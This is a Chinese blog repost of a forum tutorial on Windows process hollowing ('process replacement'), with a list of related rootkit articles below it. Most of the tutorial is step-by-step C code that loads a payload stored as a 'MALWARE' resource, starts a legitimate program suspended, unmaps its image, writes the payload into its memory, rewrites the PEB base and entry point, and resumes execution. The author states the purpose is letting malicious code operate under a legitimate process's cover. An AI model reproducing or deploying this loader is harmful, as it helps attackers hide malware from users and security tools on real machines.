[Rootkit] 进程替换

最新推荐文章于 2022-04-16 15:09:33 发布
最新推荐文章于 2022-04-16 15:09:33 发布
阅读量263 收藏 1
点赞数
分类专栏: RootKit
原文链接:https://bbs.pediy.com/thread-153508.htm
版权
本文介绍了一种将恶意代码注入合法进程的技术,通过创建挂起状态的进程,并利用NtUnmapViewOfSection等方法替换其内存空间,最终启动包含恶意代码的进程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文的进程替换是指将正在运行的程序的内存空间用恶意代码替换掉. 如果被替换的进程是合法的进程, 那么恶意代码可以披着合法的外衣干坏事了. 当然坏事干多了还是会被发现的.

替换的过程如下:

  1. 创建一个挂起状态(SUSPEND)的进程, 此时进程的主线程还未开始运行.
  2. 读取主线程的上下文(CONTEXT), 并读取新创建进程的基址.
  3. 使用NtUnmapViewOfSection将新创建的进程的内存空间释放掉, 随后可以开始填充恶意代码.
  4. 设置主线程的上下文, 启动主线程.

一. 我将恶意代码当成资源文件, 所以先将资源文件加载到内存中.

LPVOID ExtractRes(HMODULE hModule)
  {
    HRSRC hResInfo;
    HGLOBAL hResData;
    LPVOID lpResLock;
    DWORD dwSize;
    LPVOID lpAddr;
 
    hResInfo = FindResource(hModule, MAKEINTRESOURCE(101), _T("MALWARE"));
    hResData = LoadResource(hModule, hResInfo);
    lpResLock = LockResource(hResData);
    dwSize = SizeofResource(hModule, hResInfo);
    lpAddr = VirtualAlloc(0, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memcpy(lpAddr, lpResLock, dwSize);
 
    return lpAddr;
  }

二. 此时lpAddr指向恶意代码的基址, 大小是dwSize. 创建一个挂起状态的进程, 用CREATE_SUSPENDED指定.

STARTUPINFO si;
  PROCESS_INFORMATION pi;
 
  ZeroMemory(&si, sizeof(si));
  si.cb = sizeof(si);
  ZeroMemory(&pi, sizeof(pi));
  if (CreateProcess(cAppName, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED,  NULL, NULL,  &si, &pi) == 0)
  {
    return -1;
  }

三. 读取主线程的上下文, 用于恢复线程启动时使用. 此时需要读取新创建进程的基址, 用于NtUnmapViewOfSection函数.
读取基址的方法: 此时context中的EBX是指向PEB的指针, 而在PEB偏移是8的位置存放了基址. 由于PEB在新创建的进程的内存空间需要使用ReadProcessMemory来读取.

 CONTEXT context;
  context.ContextFlags = CONTEXT_FULL;
  if (GetThreadContext(pi.hThread, &context) == 0)
  {
    return -1;
  }
 
  // EBX points to PEB, offset 8 is the pointer to the base address
  if (ReadProcessMemory(pi.hProcess, (LPCVOID)(context.Ebx + 8), &dwVictimBaseAddr, sizeof(PVOID), NULL) == 0)
  {
    return -1;
  }

四. 使用NtUnmapViewOfSection函数释放内存空间, 然后在该空间申请一块空间用于存放恶意代码.
基址是pNtHeaders->OptionalHeader.ImageBase, 大小是pNtHeaders->OptionalHeader.SizeOfImage.

 typedef ULONG (WINAPI *PFNNtUnmapViewOfSection) (HANDLE ProcessHandle, PVOID BaseAddress);
  HMODULE hNtModule = GetModuleHandle(_T("ntdll.dll"));
  if (hNtModule == NULL)
  {
    hNtModule = LoadLibrary(_T("ntdll.dll"));
    if (hNtModule == NULL)
    {
      return -1;
    }
  }
 
  PFNNtUnmapViewOfSection pfnNtUnmapViewOfSection = (PFNNtUnmapViewOfSection)GetProcAddress(hNtModule, "NtUnmapViewOfSection");
  if (pfnNtUnmapViewOfSection == NULL)
  {
    return -1;
  }
 
  pfnNtUnmapViewOfSection(pi.hProcess, (PVOID)dwVictimBaseAddr);
   
  lpNewVictimBaseAddr = VirtualAllocEx(pi.hProcess,
            (LPVOID)pNtHeaders->OptionalHeader.ImageBase,
            pNtHeaders->OptionalHeader.SizeOfImage,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE);

五. 向新申请的空间写入恶意代码.

// Replace headers
  WriteProcessMemory(pi.hProcess, lpNewVictimBaseAddr, lpMalwareBaseAddr, pNtHeaders->OptionalHeader.SizeOfHeaders, NULL);
 
  // Replace each sections
  LPVOID lpSectionBaseAddr = (LPVOID)((DWORD)lpMalwareBaseAddr + pDosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS));
  PIMAGE_SECTION_HEADER pSectionHeader;
  for (idx = 0; idx < pNtHeaders->FileHeader.NumberOfSections; ++idx)
  {
    pSectionHeader = (PIMAGE_SECTION_HEADER)lpSectionBaseAddr;
    WriteProcessMemory(pi.hProcess,
      (LPVOID)((DWORD)lpNewVictimBaseAddr + pSectionHeader->VirtualAddress),
      (LPCVOID)((DWORD)lpMalwareBaseAddr + pSectionHeader->PointerToRawData),
      pSectionHeader->SizeOfRawData,
      NULL);
    lpSectionBaseAddr = (LPVOID)((DWORD)lpSectionBaseAddr + sizeof(IMAGE_SECTION_HEADER));
  }
 
  // Replace the base address in the PEB
  DWORD dwImageBase = pNtHeaders->OptionalHeader.ImageBase;
  WriteProcessMemory(pi.hProcess, (LPVOID)(context.Ebx + 8), (LPCVOID)&dwImageBase, sizeof(PVOID), NULL);

六. 设置上下文, 并启动主线程. 需要注意的是, 程序的入口点是放在EAX寄存器中的.

// Replace Entry Point Address
  context.Eax = dwImageBase + pNtHeaders->OptionalHeader.AddressOfEntryPoint;
  SetThreadContext(pi.hThread, &context);
  ResumeThread(pi.hThread);

转自:https://bbs.pediy.com/thread-153508.htm

学习笔记-第十二章 恶意代码分析实战
Yes_butter的博客
03-24 1575
第12章 隐蔽的恶意代码启动 1.启动器 启动器是一种设置自身或其他恶意代码片段以达到即使或将来秘密运行的恶意代码。 启动器的目的是安装一些东西,以使恶意行为对用户隐蔽。 启动器经常包含它要加载的恶意代码。最常见的情况是在它的资源节中包含一个可执行文件或者dll。 正常情况下,Windows pe文件格式中的资源节是供可执行程序使用的,但并不应该是可执行程序的 组成代码。正常资源节的内容...
rootkit,文件,进程隐藏
11-05
攻击者通过修改或替换这些调用,可以监控或控制系统行为,例如拦截网络通信,隐藏进程或文件,甚至在某些情况下,使反病毒软件失效。 `ps进程隐藏`是指攻击者使用rootkit技术来隐藏其在系统进程列表中的存在。正常...
进程替换的一点想法
我的幻想之都
04-28 571
RING3级:现在网上很多的进程替换都是说A 建立C进程(僵尸进程),然后把C所有的Section都Free掉,把B文件手动LOAD重定位,并在C进程空间申请合适的位置,完成后恢复C的运行,运行的结果是用了C的壳做了B的事。(这样卡巴是过不了的,对WriteProcessMemory监控,使用Mapping会有CopyOnWrite)但我在想,如果可以A用B替换,那不是更好吗?由于做了类似
进程替换
weixin_30315905的博客
11-20 253
进程替换的原理: 1.先利用CreateProcess来创建一个进程,但是在创建的过程中需要以挂起的方式去创建 2.进程被创建后,恶意代码就需要将进程的内存空间进行替换,通常会使用ZwUnmapViewOfSection来释放指向的内存 3.原宿主的内存被释放后,需要用VirtualAllocEx为恶意代码分配内存,并搭配WriteProcessMemory来搭配使用写入受害进程中 4.最...
使用VirtualAlloc()创建虚拟内存,修改可读、可写属性
dijkstar的专栏
07-12 4215
#include void main(){ SYSTEM_INFO sf; GetSystemInfo(&sf); //分配内存,标记为提交、可读可写 LPVOID lpvBase = VirtualAlloc(        NULL,                 // system selects address        4096,     // size of alloca
网络安全之恶意代码
热门推荐
学而思(xiejava的blog)
01-17 2万+
恶意代码是一种有害的计算机代码或 web 脚本,其设计目的是创建系统漏洞,并借以造成后门、安全隐患、信息和数据盗窃、以及其他对文件和计算机系统的潜在破坏。恶意代码不仅使企业和用户蒙受了巨大的经济损失,而且使国家的安全面临着严重威胁。1991年的海湾战争是美国第一次公开在实战中使用恶意代码攻击技术取得重大军事利益,从此恶意代码攻击成为信息战、网络战最重要的入侵手段之一。恶意代码问题无论从政治上、经济上、还是军事上,都成为信息安全面临的首要问题。让我们一起来认识一下恶意代码。 一、什么是恶意代码 恶意代码(Un
Rootkit---进程隐藏
q759451733的博客
04-16 5289
进程隐藏
Rootkit
tiandyoin的专栏
07-14 1万+
Rootkit自身也是木马后门或恶意程序的一类,只是,它很特殊,为什么呢?因为,你无法找到它。 正如自然界的规则一样,最流行的病毒,对生物的伤害却是最小的,例如一般的感冒,但是最不流行的病毒,却是最夺命的。Rootkit木马就是信息世界里的 AIDS,一旦感染,就难以用一般手段消灭了,因为它和自然界里的同类做的事情一样,破坏了系统自身检测的完整性——抛开术语的描述也许难以理解,但是可以配合AID
[Rootkit] 进程隐藏 - 内存加载(进程寄生)
LYSM
06-11 1878
众所周知,windows下可执行文件必须符合一定的格式要求,微软官方称之为PE文件(关于PE文件的详细介绍这里就不赘述了,google一下可以找到大把);用户在界面双击exe时,有个叫做explorer的进程会监测并接受到这个事件,然后根据注册表中的信息取得文件名,再以Explorer.exe这个文件名调用CreateProcess函数去运行用户双击的exe;PC中用户一般都是这样运行exe的,所以很多用户态的exe都是exlporer的子进程,用process hacker截图如下: 那么这个explo
[Rootkit] 进程隐藏 - 内存加载(寄生&僵尸进程
优快云
07-16 8338
这就导致了另一个问题:同样一个段,在磁盘中相对文件起始的距离,和内存中相对imageBase的距离是不一样的(因为地址对齐,拉伸了)!所以只能把需要用到的这些系统函数统一放在一张叫做导入表的表格,explorer加载的时候还要挨个遍历导入表,一旦发现该PE文件用到了某些系统API,需要用这些API在内存的真实地址替换PE文件中call的地址(这也是用OD、x96dbg这些常见的调试器能找到这些系统函数的根本原因:都是系统提供的嘛,函数名必须保存起来,否则加载的时候没法替换成内存中真正的地址)!
在2000和xp下,隐藏进程.rar_rootkit_进程 隐藏_进程隐藏_隐藏 进程_隐藏进程
09-14
2. **API Hooking**:Rootkit替换系统调用表中的某些关键函数,比如`EnumProcesses`和`OpenProcess`,当其他程序试图列举或访问进程时,返回被修改的结果,使得目标进程不可见。 3. **权限提升**:Rootkit通常...
windows xp隐藏进程 源代码.rootkit技术
01-24
- API Hooking:Rootkit替换或拦截系统API,使其返回虚假信息,从而隐藏自己的存在。 - Memory Allocation技巧:通过特殊方式分配和使用内存,使进程在系统扫描时难以被发现。 - IRP(I/O请求包)处理:对于Ring0 ...
反隐藏进程技术检测技术 基本能查出当前所有Rootkit隐藏的进程 利用挂钩线程调度链表来实现.zip
01-28
Rootkit通过篡改SSDT,可以将原本的系统服务替换为自己的恶意代码,使得系统调用时执行的是Rootkit的逻辑,而非原生的系统服务。 针对这种情况,反隐藏进程技术通过监控SSDT的变化来检测Rootkit的存在。这种方法...
少儿编程scratch项目源代码文件案例素材-直升机飞行.zip
04-30
少儿编程scratch项目源代码文件案例素材-直升机飞行.zip
wanjunshe_Python-Tensorflow_12888_1745868924470.zip
04-30
wanjunshe_Python-Tensorflow_12888_1745868924470
健康监测_Android开发_BLE蓝牙通信_心率数据采集与存储_基于小米手环2的实时心率监测应用_支持后台长时间运行的心率记录工具_可导出SQLite数据库的心率数据分析系统_适.zip
04-30
健康监测_Android开发_BLE蓝牙通信_心率数据采集与存储_基于小米手环2的实时心率监测应用_支持后台长时间运行的心率记录工具_可导出SQLite数据库的心率数据分析系统_适
少儿编程scratch项目源代码文件案例素材-种花模拟器.zip
04-30
少儿编程scratch项目源代码文件案例素材-种花模拟器.zip
嵌入式系统开发_FreeRTOS实时操作系统_STM32F103C8T6微控制器_OLED显示屏_DHT11温湿度传感器_多任务调度_多级菜单设计_万年历算法_电子闹钟功能_参数配.zip
04-30
嵌入式系统开发_FreeRTOS实时操作系统_STM32F103C8T6微控制器_OLED显示屏_DHT11温湿度传感器_多任务调度_多级菜单设计_万年历算法_电子闹钟功能_参数配
基于python实现的粒子群的VRP(车辆配送路径规划)问题建模求解+源码+项目文档+算法解析(毕业设计&课程设计&项目开发)
最新发布
04-30
基于python实现的粒子群的VRP(车辆配送路径规划)问题建模求解+源码+项目文档+算法解析,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用,详情见md文档 算法设计的关键在于如何向表现较好的个体学习,标准粒子群算法引入惯性因子w、自我认知因子c1、社会认知因子c2分别作为自身、当代最优解和历史最优解的权重,指导粒子速度和位置的更新,这在求解函数极值问题时比较容易实现,而在VRP问题上,速度位置的更新则难以直接采用加权的方式进行,一个常见的方法是采用基于遗传算法交叉算子的混合型粒子群算法进行求解,这里采用顺序交叉算子,对惯性因子w、自我认知因子c1、社会认知因子c2则以w/(w+c1+c2),c1/(w+c1+c2),c2/(w+c1+c2)的概率接受粒子本身、当前最优解、全局最优解交叉的父代之一(即按概率选择其中一个作为父代,不加权)。 算法设计的关键在于如何向表现较好的个体学习,标准粒子群算法引入惯性因子w、自我认知因子c1、社会认知因子c2分别作为自身、当代最优解和历史最优解的权重,指导粒子速度和位置的更新,这在求解函数极值问题时比较容易实现,而在VRP问题上,速度位置的更新则难以直接采用加权的方式进行,一个常见的方法是采用基于遗传算法交叉算子的混合型粒子群算法进行求解,这里采用顺序交叉算子,对惯性因子w、自我认知因子c1、社会认知因子c2则以w/(w+c1+c2),c1/(w+c1+c2),c2/(w+c1+c2)的概率接受粒子本身、当前最优解、全局最优解交叉的父代之一(即按概率选择其中一个作为父代,不加权)。
深入解析Windows Rootkit进程隐藏技术
Rootkit通过修改系统核心数据结构或替换系统函数来实现隐藏进程、文件、注册表项等功能,从而获得系统的最高控制权限。由于Rootkit的隐藏性质,它通常被用于维持远程访问、窃取信息、避免被安全软件检测等恶意目的。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值